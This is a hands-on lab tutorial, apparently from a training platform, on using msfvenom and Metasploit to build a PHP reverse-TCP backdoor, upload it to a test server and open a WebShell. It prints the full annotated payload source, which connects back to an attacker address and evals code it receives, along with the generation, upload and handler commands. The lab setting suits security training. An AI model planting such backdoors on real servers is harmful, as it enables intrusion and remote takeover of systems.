Using Metasploit to Create a WebShell
1. Experiment Overview
1.1 Experiment Description
It is well known that in the fast-developing internet era, web servers are highly vulnerable to hacker attacks. Among the many programming languages, PHP is a language favored for its ease of learning. While the statement “PHP is the best programming language in the world” has sparked much debate, one indisputable fact is that PHP-based websites are abundant, making PHP-based backdoors a popular choice for hackers.
This experiment focuses on using Msfvenom to generate a PHP backdoor and explains critical pieces of the PHP backdoor source code. After uploading the backdoor to the target machine (victim server), we will use Metasploit to establish a WebShell and control the victim server.
Typically, once control is obtained over the target host, privilege escalation activities are carried out depending on the current user’s permission level. This lab will highlight the generated PHP backdoor’s source code, annotating each line to help participants better understand the backdoor’s operating mechanism.
Note: Due to the high costs of operating the cloud server for the lab, the number of attempts is limited to six per experiment.
1.2 Key Knowledge Areas
This experiment is hands-on and integrates essential theoretical knowledge to help participants proficiently use Metasploit to create a WebShell. Below are the key focus areas for this course:
- Basic operations in Linux systems
- Core concepts of the Metasploit framework
- Basic PHP syntax
- Verification methods after a successful exploit
1.3 Experimental Environment
The lab environment consists of a Kali Linux virtual machine as the attacker system and an Ubuntu server as the target machine. We will use Msfvenom to create a PHP backdoor on Kali and upload it to the target machine, thereby infecting and establishing a WebShell.
Theoretically, once the PHP backdoor is generated on the Kali system and uploaded to any directory of a target website that can execute PHP code, the respective host will be infected, granting control privileges for further exploitation like privilege escalation or persistent access.
In this experiment, participants can freely choose one of two available target machines with PHP execution environments: the Ubuntu host and the Metasploitable2 virtual machine.
2. Starting the Experiment Environment
2.1 Launching the Lab Environment
In this demonstration, we will use Ubuntu 14.04 as the target machine. First, navigate to the Kali Linux virtual machine in the lab environment.
$ docker run -ti --network host 6f113 bash
3. Tool Introduction
3.1 Workflow Overview
Creating a WebShell with Metasploit generally involves four steps: generating the backdoor, uploading it to the target machine, launching an attack using Msfconsole, and establishing a connection. The workflow is illustrated below:
The process steps include creating a payload using Msfvenom, uploading it, and finally, receiving a connection between the attacker and the target server. Participants must understand:
- How to generate a backdoor file?
- How to retrieve a WebShell after uploading the backdoor?
In this training lab, uploading the backdoor assumes administrator privileges on the target machine. This experiment is based on scenarios where the attacker has already exploited a vulnerability and gained necessary permissions.
For participants interested in the vulnerability exploitation process leading to target control, check out this hands-on course: Kali Server Attacks in Action.
3.2 Overview of Tools
Msfvenom is the tool used to generate payloads in this experiment. Here’s a brief introduction:
Msfvenomcombines the functionalities ofMsfpayloadandMsfencode. It is a unified and efficient command-line tool widely used in security assessments.
Metasploit, an open-source framework heavily used in penetration testing and security assessments, will also be utilized:
Metasploit helps IT/security professionals identify security vulnerabilities, validate defense mechanisms, and conduct in-depth security evaluations. Packed with hundreds of known vulnerabilities, it is regularly updated and regarded as a powerful penetration testing tool.
4. Process Implementation
4.1 Generate PHP Trojan
In general, we need to develop a Trojan program according to the target machine’s situation. Usually, the Trojan program is affected by the target machine’s operating environment. In this experiment, the Trojan’s operating environment can run PHP code. After introducing the basic tool background in the previous section, we use the following command to create a PHP Trojan file in the Kali Linux environment of the laboratory building. The file name is hello.php:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.122.101 -f raw > hello.php
This sentence means to enter the IP address of the attacker’s host 192.168.122.101, where the command parameters have the following meanings:
| Parameter name | Meaning |
|---|---|
-p | Specify the payload to be used. |
-l | Lists all available resources for the specified module. |
-f | Specify output format (use –help-formats to get a list of output formats supported by msf) |
-v | Specifies a custom variable to determine the output format. |
After success, it will be as shown below:
You can then use lsthe command to view the files in the current directory. At this point, hello.phpthe Trojan file has been generated and you can cat hello.phpview the contents of the file using:
4.2 Analysis of PHP Trojan Code
For the PHP Trojan generated using msfvenom, its source code is as follows:
/*<?php /**/ error_reporting(0);
// Attacker's target IP address
$ip = '192.168.122.101';
// Attacker's port is 4444
$port = 4444;
if (($f = 'stream_socket_client') && is_callable($f)) {
// Connect to IP address and port
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
// Connect to IP address and port
$s = $f($ip, $port);
// Type is stream
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
$s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
// Establish a connection by protocol, ip address, and port
$res = @socket_connect($s, $ip, $port);
// Determine if it is empty, and terminate the script function if it is empty
if (!$res) {
die();
}
// Data type of connection
$s_type = 'socket';
} else {
die('no socket funcs');
}
// If there is no socket connection, an error is reported
if (!$s) {
die('no socket');
}
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
// Determine whether it is empty based on the length. If it is empty, terminate the script function
if (!$len) {
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
// Call the corresponding data reading function according to the type stream or socket
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}
// Save the value of $s as a global variable
$GLOBALS['msgsock'] = $s;
// Save the value of $s_type as a global variable
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
4.3 Upload to the target machine
Upload the generated PHP Trojan file to the host machine of the laboratory building, which is the target machine of the laboratory building 192.168.122.1. The IP address is. In general, the command to view the IP address of the local machine is ifconfig. Next, we upload the file and enter the following command:
# In the lab environment, if you upload directly to the website directory of the target host, it will show that you do not have permission, so upload to the target host first
# Upload the Trojan program to the tmp folder of the target host
scp hello.php [email protected]:/tmp
The host account name shiyanlouand password are shiyanlou:
Install apache2 on the host machine in the lab building and start apachethe service. Also install php5 to test the PHP Trojan:
#Update software source
sudo apt-get update
#Install apache2
sudo apt-get install -y apache2
#Start apache service
sudo service apache2 start
Enter the following command to copy the Trojan file to the root directory of the website:
# Copy the PHP Trojan program to the website directory
sudo cp /tmp/hello.php /var/www/html/
4.4 Creating a WebShell using Metasploit
After the above steps are successful, then open the MSF terminal in Kali:
# Open the MSF terminal in Kali terminal
msfconsole
Enter the following commands respectively:
# Use the corresponding module
use multi/handler
set payload php/meterpreter/reverse_tcp
# View the parameters that need to be filled in
show options
# Set the attacker's host parameters
set LHOST 192.168.122.101
After entering the attack command, enter the standby state:
# Attack the target host
exploit
At this time, just visit the page on the website with the Trojan horse. In the Firefox browser, enter the following address:
127.0.0.1/hello.php
4.5 View the target drone’s information
Enter the command to view the target machine information:
# View system information
sysinfo
# View current id
getuid
# View current path
pwd
# View files in current directory
ls
V. Summary and Thoughts
5.1 Summary and Thoughts
This experiment is a pure hands-on experiment. During the experiment, we used basic Linux operation commands and commented on almost every line of the PHP Trojan source code. We also established a WebShell through the Metasploit terminal. The knowledge points involved in this experiment are:
- Basic knowledge of Linux system operation
- Basic knowledge of Metasploit Framework
- Basic PHP syntax knowledge
- Verification method after successful penetration
In this experiment, we will review the process again: generate PHP Trojan file ==> upload to the target machine ==> use Metasploit to attack ==> successfully create WebShell.
I hope that students can master the method and process of establishing WebShell. It is enough to understand the PHP Trojan code, and it is better to know the main parameters of the PHP Trojan to establish a connection. After learning this experiment, I recommend you to read some reference materials about Kali: